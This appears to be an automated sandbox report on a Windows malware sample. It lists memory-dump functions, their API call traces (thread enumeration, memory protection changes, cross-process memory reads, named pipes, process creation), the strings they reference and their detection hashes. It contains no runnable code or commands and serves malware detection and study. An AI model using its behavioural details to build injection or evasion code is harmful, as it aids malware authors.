Opcode Fuzzy Hash: ff63ff66fa34518b3a3bd66b28a0deaf480409b9d27388dd4b51510b85279938
Instruction Fuzzy Hash: A1118275600245BBDB149B49ECD1EEE77E8EB45710FA000B6F602E7291DA70AD81D761

Uniqueness

Uniqueness Score: -1.00%

Function 00B24E92, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,00B3E160,00000018,00B27789,NTDLL.DLL,7250775A,00B27789,NTDLL.DLL,4772644C,00B27789,NTDLL.DLL,4C72644C,?,00000000,?,00B27789), ref: 00B24F47

Strings

NTDLL.DLL, xrefs: 00B24EDB, 00B24EFF, 00B24F23

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: NTDLL.DLL
API String ID: 3510742995-1613819793
Opcode ID: cc7a880e22180990dd4e873640d2cac68fc3ff52839de13950e45681cb0e5daa
Instruction ID: d5b25e88ad2355cfec3a1848cf944bc87b56d1390910abc4c2787862d100c207
Opcode Fuzzy Hash: cc7a880e22180990dd4e873640d2cac68fc3ff52839de13950e45681cb0e5daa
Instruction Fuzzy Hash: A9116735600518AFD724EF15FC82CAA3BE9F78431072541A7EA2CAB1B1EF30E904CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B22A2E, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000,00000000), ref: 00B22A5E
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 00B22AA5

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 58f2b88271c1d289cc281464c1b73ce395e3bc0833d39cff1b3782757086c7df
Instruction ID: f13b5e3b74bf098ff985ab7089fff5ea8ac2d9705acae45c576d0c31ef0ccd33
Opcode Fuzzy Hash: 58f2b88271c1d289cc281464c1b73ce395e3bc0833d39cff1b3782757086c7df
Instruction Fuzzy Hash: FB11A575900218FBDB21DFA9E884B9EBBF9EFA6754F204099E418D7204EB748E45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CF2A, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,63699BC3,00000000,00B27CE2,?), ref: 00B2CF67
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00B27CE2,?,?), ref: 00B2CFC8

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: aa3124405b154e552b9c73985c35896de6a63f69e14c2abbdd90752a352a9425
Instruction ID: 57046bf8b4c21f02eb1f802f4b16ad30ca6dc26720d9b6331a38eea42f6ec330
Opcode Fuzzy Hash: aa3124405b154e552b9c73985c35896de6a63f69e14c2abbdd90752a352a9425
Instruction Fuzzy Hash: C411CB75900219EBCB00DBA4EE45B9E7BFDEB04305F2005A2B506E3191DB74DA44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B264FD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

HeapFree.KERNEL32(00000000,00000000,00000000,1795F247,Kill,00000000,?,?,?,00000000,00B27E8C,00B2046A,00000000,00000000), ref: 00B26568

Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00B16281,00000000), ref: 00B180C8
Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00B16281,00000000), ref: 00B180D7

Part of subcall function 00B1A7B1: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,73BCF5B0,00B27D3D,61636F4C,00000001,?,?), ref: 00B1A7D7
Part of subcall function 00B1A7B1: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B1A7E3
Part of subcall function 00B1A7B1: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 00B1A7FA
Part of subcall function 00B1A7B1: GetProcAddress.KERNEL32(00000000), ref: 00B1A801
Part of subcall function 00B1A7B1: Thread32First.KERNEL32(?,0000001C), ref: 00B1A811
Part of subcall function 00B1A7B1: CloseHandle.KERNEL32(?), ref: 00B1A859

Strings

Kill, xrefs: 00B2650A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: e701b75c39bd60091fe5da8c817d32a01c6a487ba50b492dec3c21f3dbb8bc1f
Instruction ID: 31bb93e61a3463d2a0219dfce5858acac69e5a5bede0b2aa91c762eea3722baf
Opcode Fuzzy Hash: e701b75c39bd60091fe5da8c817d32a01c6a487ba50b492dec3c21f3dbb8bc1f
Instruction Fuzzy Hash: EC01817561021CFB9B129BA5ED85D9FBBFEEF1434472000A6F801A3160EE71AE04C661

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CE39, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,00B27E87,00B2046A,00000000,00000000), ref: 00B2CEAB

Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00B16281,00000000), ref: 00B180C8
Part of subcall function 00B180B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00B16281,00000000), ref: 00B180D7

Part of subcall function 00B194B4: lstrlen.KERNEL32(?,00000000,00000000,73B75520,?,?,?,00B11647,0000010D,00000000,00000000), ref: 00B194E4
Part of subcall function 00B194B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B194FA
Part of subcall function 00B194B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,00B11647,0000010D), ref: 00B19530
Part of subcall function 00B194B4: memcpy.NTDLL(00000010,00000000,00B11647,?,?,?,00B11647), ref: 00B1954B
Part of subcall function 00B194B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00B19569
Part of subcall function 00B194B4: GetLastError.KERNEL32(?,?,?,00B11647), ref: 00B19573
Part of subcall function 00B194B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00B11647), ref: 00B19599

Strings

Scr, xrefs: 00B2CE46

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: b67a1627b8110d5e537679be5379aa94f388fdaa125f27704a3cb60f715a6dc3
Instruction ID: e9e46aae30349d9c01953c5866657172210f46594c39f47d9677835f2775d228
Opcode Fuzzy Hash: b67a1627b8110d5e537679be5379aa94f388fdaa125f27704a3cb60f715a6dc3
Instruction Fuzzy Hash: 56018631500214FADB21A791ED0AFDF7FEEEB04714F200096F906A31A0DEB0EE04D661

Uniqueness

Uniqueness Score: -1.00%

Function 001F2156, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 001F2170
SysFreeString.OLEAUT32(00000000), ref: 001F21B0

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f6bd284c805fcd429cb27171d31807bfa4a3d8852eecd434b25310e0143efa0d
Instruction ID: 037641b39a7d15fb4b4b3b0f20c037d1d634ed8033f8ce51a28917540142d2f6
Opcode Fuzzy Hash: f6bd284c805fcd429cb27171d31807bfa4a3d8852eecd434b25310e0143efa0d
Instruction Fuzzy Hash: AD016D7651020EBBDB119FA8DD08DBF7BB9FF88310B114021FE05E6120E7709A59DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B19882, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B1988C
RtlLeaveCriticalSection.NTDLL(00B3E240), ref: 00B198C8

Part of subcall function 00B1EC30: lstrlen.KERNEL32(?,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B1EC7D
Part of subcall function 00B1EC30: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1EC8F
Part of subcall function 00B1EC30: lstrcpy.KERNEL32(00000000,?), ref: 00B1EC9E
Part of subcall function 00B1EC30: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,00B16222,00B3D4E4,?,?,00000004,00000000,?,00000000,00B1B275), ref: 00B1ECAF

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: 5807960667d9e1dab2e73ffe43da908ca45c486a4b80586bf9de33e2cf7865f5
Instruction ID: df24e742900e6101888f042415840073faf55f239da5e6da8ff476866ae59a9b
Opcode Fuzzy Hash: 5807960667d9e1dab2e73ffe43da908ca45c486a4b80586bf9de33e2cf7865f5
Instruction Fuzzy Hash: A1F0E5362022149F87246F18AC85CABF7ECFB9A35032542DBF925533A1CF629C418AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B21884, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00B3DF5C), ref: 00B21899

Part of subcall function 00B1A027: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B1A052
Part of subcall function 00B1A027: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00B1A05F
Part of subcall function 00B1A027: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00B1A0EB
Part of subcall function 00B1A027: GetModuleHandleA.KERNEL32(00000000), ref: 00B1A0F6
Part of subcall function 00B1A027: RtlImageNtHeader.NTDLL(00000000), ref: 00B1A0FF
Part of subcall function 00B1A027: RtlExitUserThread.NTDLL(00000000), ref: 00B1A114

InterlockedDecrement.KERNEL32(00B3DF5C), ref: 00B218BD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 33db452d69b060d7c160c3b4b1bd3db18e4704c9a63ac2bd2798e9e04a46894b
Instruction ID: 93a3b66790aae53616f6f1a1c3878628642a6d53bebe8dd74f6c22577acadd44
Opcode Fuzzy Hash: 33db452d69b060d7c160c3b4b1bd3db18e4704c9a63ac2bd2798e9e04a46894b
Instruction Fuzzy Hash: 68E01235204236679B297B68BC8565E7BD1EB70744F104AA4F64DD50B1CB10C8449692

Uniqueness

Uniqueness Score: -1.00%

Function 001FA53C, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(001FD1F4), ref: 001FA551

Part of subcall function 001F24C2: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 001F24D7

InterlockedDecrement.KERNEL32(001FD1F4), ref: 001FA571

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 54ada47d1c8f2a4b524f12652287a08518167fd71320c7fbaef6f9da410c6b50
Instruction ID: 6e08331e3b5b653c21960cb745235d468992cb069cdba04c5288b74d82e48f04
Opcode Fuzzy Hash: 54ada47d1c8f2a4b524f12652287a08518167fd71320c7fbaef6f9da410c6b50
Instruction Fuzzy Hash: CFE086B134412E97C62197B49D05B7B6B51AF20780F814614F78DD10F0E754CC95C6E7

Uniqueness

Uniqueness Score: -1.00%

Function 001F21C3, Relevance: 2.6, APIs: 2, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

memset.NTDLL ref: 001F226E
memset.NTDLL ref: 001F2282

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memset$AllocateHeap
String ID:
API String ID: 3561238450-0
Opcode ID: ab5e864cdf3d1e6a8f39cd7b2dba85db175660a5efaea1411bdf2037cd4fb31e
Instruction ID: f423797646b98242e3ff9196603fb70da72c01280b70141b55b6d783c8207d39
Opcode Fuzzy Hash: ab5e864cdf3d1e6a8f39cd7b2dba85db175660a5efaea1411bdf2037cd4fb31e
Instruction Fuzzy Hash: 3A21FF75A00218ABDF11AFA9DC41FFE7BB8AF19350F044055FA09E6251E734DA40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B14926, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29D35: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00B29D6E
Part of subcall function 00B29D35: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B29DA4
Part of subcall function 00B29D35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B29DB0
Part of subcall function 00B29D35: lstrcmpi.KERNEL32(?,00000000), ref: 00B29DED
Part of subcall function 00B29D35: StrChrA.SHLWAPI(?,0000002E), ref: 00B29DF6
Part of subcall function 00B29D35: lstrcmpi.KERNEL32(?,00000000), ref: 00B29E08
Part of subcall function 00B29D35: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B29E59

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00B3A5A8,0000002C,00B29AAA,NTDLL.DLL,6547775A,?,00B11224), ref: 00B14965

Part of subcall function 00B2AC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00B2ACBD
Part of subcall function 00B2AC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B26D3E,00000000,00000000,00000028,00000100), ref: 00B2ACDF

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,00B3A5A8,0000002C,00B29AAA,NTDLL.DLL,6547775A,?,00B11224), ref: 00B149F0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: efb34d19e4b2a4c4bc542ec5589a0d126156f816fbd4f33201fd95e9cf0cb822
Instruction ID: b4970d6b281b7cfe2674098a162515a6219201e8418ece991cc8865045debbf4
Opcode Fuzzy Hash: efb34d19e4b2a4c4bc542ec5589a0d126156f816fbd4f33201fd95e9cf0cb822
Instruction Fuzzy Hash: D521B375D01229AFCF219FA5DC81ADEBBB5FF08760F60816AF918B6250C7345A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 001F4B22, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,?,003FBFB0,00000000,?,001FC068,00000000,001FC040), ref: 001F4B71

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61282cfc90e36896042a9cb11753627117fbf737fa5743dad3bd7e2c4322efe0
Instruction ID: f47c75508c413ee57bef8f447cdb33223376af84877473a6cd95701fdc37c04a
Opcode Fuzzy Hash: 61282cfc90e36896042a9cb11753627117fbf737fa5743dad3bd7e2c4322efe0
Instruction Fuzzy Hash: F4318B3690010CBFDB21EB90ED89EBA7BADFB54304F2400A5F605A7571D770AE45EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1614C, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441,00000000,?,00000000,00B1B275,?,?,00000000,?,?,00000001,00000000,?,00000001,00B383E4,00000002), ref: 00B16161

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dc841018bbe4c38ebc3fc110ca05a6a04f24970be577fcc77a73e14300844c74
Instruction ID: bce0f34b0f2635be54e7c3fcdf381f9beb731fa42fc2a70693be0efe124fe389
Opcode Fuzzy Hash: dc841018bbe4c38ebc3fc110ca05a6a04f24970be577fcc77a73e14300844c74
Instruction Fuzzy Hash: EA218676A00114FFCB10DF98E881ADD77F9FB44314FA444E6E614A7246D671AD81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001F484A, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

GetModuleHandleA.KERNEL32(?,00000020,74183966,00000000,00000000,?,?,?,001FA418,?,00000001,?,?,00000000,00000000), ref: 001F486F

Part of subcall function 001F6EF1: NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,001FC048,00000000,00000000,001F4909), ref: 001F6F4E
Part of subcall function 001F6EF1: memset.NTDLL ref: 001F6F70

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 2430402485-0
Opcode ID: 9d952a4759f0faee1041027a5a3d923501e004996011fa4c3976ec2f6ac33b00
Instruction ID: 19496c230bf477b99d8c48985db5025b697f0592c33eed87bcf6746311ebabac
Opcode Fuzzy Hash: 9d952a4759f0faee1041027a5a3d923501e004996011fa4c3976ec2f6ac33b00
Instruction Fuzzy Hash: 392128B160020AAFDB10EF69DD44E7B77ECFB483487114569EA49C7621EB74EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F8A54, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 001F8A6C

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 397feb683b054d5fd45bb613c81bca40519587426c0353d1ff31981a06ca8980
Instruction ID: 1a42286309699907a9b01f83ec145ed652297375619f6271843f16c194dbfa14
Opcode Fuzzy Hash: 397feb683b054d5fd45bb613c81bca40519587426c0353d1ff31981a06ca8980
Instruction Fuzzy Hash: BB11E9312853459FEB158F2DD851BF97BA5DB67358F14408FE5808B392C277890BC760

Uniqueness

Uniqueness Score: -1.00%

Function 00B23B01, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,00B3D514,00000000,?,?,00B1619F,00000004,00000000,?,00000000,00B1B275,?,?), ref: 00B23B3C

Part of subcall function 00B2CD7A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B3E240), ref: 00B2CD91

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 62ce9ac6ac20f0860be25bd005c28bd3207416c6faf4f56346ff267a0326e1e5
Instruction ID: 42fc0f3ed1aa26267baeab25e545d2fc912671b4b3d81e47b01bb4aab16a63b8
Opcode Fuzzy Hash: 62ce9ac6ac20f0860be25bd005c28bd3207416c6faf4f56346ff267a0326e1e5
Instruction Fuzzy Hash: DD21AF32600624AFDB20CF59E8D8D6977E9EF44B9072444A9F94DCB250DB78EE41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B32B84, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00B32BD6

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 583bd0189639d772ef235451f3dd3f2fb7dd28765ada5fb41ba5922ce1e83073
Instruction ID: 6a953d14cc2d7d83897c072087e445f8819b0db5208937ec1bc76d2f94a94d70
Opcode Fuzzy Hash: 583bd0189639d772ef235451f3dd3f2fb7dd28765ada5fb41ba5922ce1e83073
Instruction Fuzzy Hash: 02111B32600209AFDF018FA9DC409DABBAAFF48370B158169FD2892160DB71DD21DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F4F6C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 001F230C: lstrlenW.KERNEL32(?), ref: 001F2315
Part of subcall function 001F230C: memcpy.NTDLL(00000000,?,?,?,?), ref: 001F233F
Part of subcall function 001F230C: memset.NTDLL ref: 001F2353

SysFreeString.OLEAUT32(00000000), ref: 001F4FD2

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeStringlstrlenmemcpymemset
String ID:
API String ID: 1945096531-0
Opcode ID: 7d37aedb46a0191162b7411a4ead00f42dd8b4a3e238f8e6ba9a307df419b3b8
Instruction ID: bdc079cc6efb9491d2d56b682f7d5984766fcddb4aa812851c7d512175cc1b62
Opcode Fuzzy Hash: 7d37aedb46a0191162b7411a4ead00f42dd8b4a3e238f8e6ba9a307df419b3b8
Instruction Fuzzy Hash: F6014C3150001DBBDB11AF98DD04DBEBBB9FB04710B114555EA15E6061E7709951D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001F81C0, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F8A54: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 001F8A6C

Part of subcall function 001F4FE9: lstrlen.KERNEL32(001FC068,?,00000000,?,001FC068), ref: 001F501D
Part of subcall function 001F4FE9: StrStrA.SHLWAPI(00000000,?), ref: 001F502A
Part of subcall function 001F4FE9: RtlAllocateHeap.NTDLL(00000000,?), ref: 001F5049
Part of subcall function 001F4FE9: memcpy.NTDLL(00000000,0000000B,0000000B), ref: 001F505D
Part of subcall function 001F4FE9: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 001F506C
Part of subcall function 001F4FE9: memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 001F5087

RtlFreeHeap.NTDLL(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,001F8F09), ref: 001F8216

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Heapmemcpy$Allocate$Freelstrlen
String ID:
API String ID: 4098479933-0
Opcode ID: cc37aee228470f32b5b5c7d297d4ae907141a29886d0fdec8ee642bd320ee07c
Instruction ID: bb020faef4125b690998838f2fc2b028f220e8ba8a8a28f0bde40c3582d6ad6b
Opcode Fuzzy Hash: cc37aee228470f32b5b5c7d297d4ae907141a29886d0fdec8ee642bd320ee07c
Instruction Fuzzy Hash: F1011D7A100508FFDB11CF44DC41EBA7BA9EB54750F204025FA5996560EB31EA45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D9EB, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B21F00: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B3E088,00000000,00B1D9F2,?,00B19809,?), ref: 00B21F1F
Part of subcall function 00B21F00: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B3E088,00000000,00B1D9F2,?,00B19809,?), ref: 00B21F2A
Part of subcall function 00B21F00: _wcsupr.NTDLL ref: 00B21F37
Part of subcall function 00B21F00: lstrlenW.KERNEL32(00000000), ref: 00B21F3F

ResumeThread.KERNEL32(00000004,?,00B19809,?), ref: 00B1DA00

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 1ecd5f71ed77b9e0488def1f1441b91456e9a3898c901c3a988ba0c897af411b
Instruction ID: e243cc92292dea71caaf30b3dc9c742b40096e2fcd852e74edcf516a6c277e1c
Opcode Fuzzy Hash: 1ecd5f71ed77b9e0488def1f1441b91456e9a3898c901c3a988ba0c897af411b
Instruction Fuzzy Hash: 7ED0A730218300EADB21AB20CE05B4BBDD1BF30B81F508C98FBCA600B5D7318850D609

Uniqueness

Uniqueness Score: -1.00%

Function 00B365AA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B3659C

Part of subcall function 00B366AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00B10000), ref: 00B36725

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 5d00c530f438b5b571e5c9d4f350d44dd7d4d7771754e20827393bf35faf7d28
Instruction ID: ceed7f3815415292e67b2275e4bac6930d5c792dda90682d3acf7584d7a64c98
Opcode Fuzzy Hash: 5d00c530f438b5b571e5c9d4f350d44dd7d4d7771754e20827393bf35faf7d28
Instruction Fuzzy Hash: C2A011C22A8002BC30082200AC03C3B33ECC0F8BA3B32C8AAF082C00A0A8802C000032

Uniqueness

Uniqueness Score: -1.00%

Function 00B3658F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B3659C

Part of subcall function 00B366AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00B10000), ref: 00B36725

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d299a7c1e47b629a890ccd062f3128d3f736c5b62038e9a3a60d84a369cf6b0e
Instruction ID: b2ffd3a1af096c34dc906549dd45a106d0ee27ec51fac90fe3e04551e4f8dc8b
Opcode Fuzzy Hash: d299a7c1e47b629a890ccd062f3128d3f736c5b62038e9a3a60d84a369cf6b0e
Instruction Fuzzy Hash: D5A011C22A82023C30082200AC03C3B33ECC0F0B23B32C0AAF080C00A0A8882C000032

Uniqueness

Uniqueness Score: -1.00%

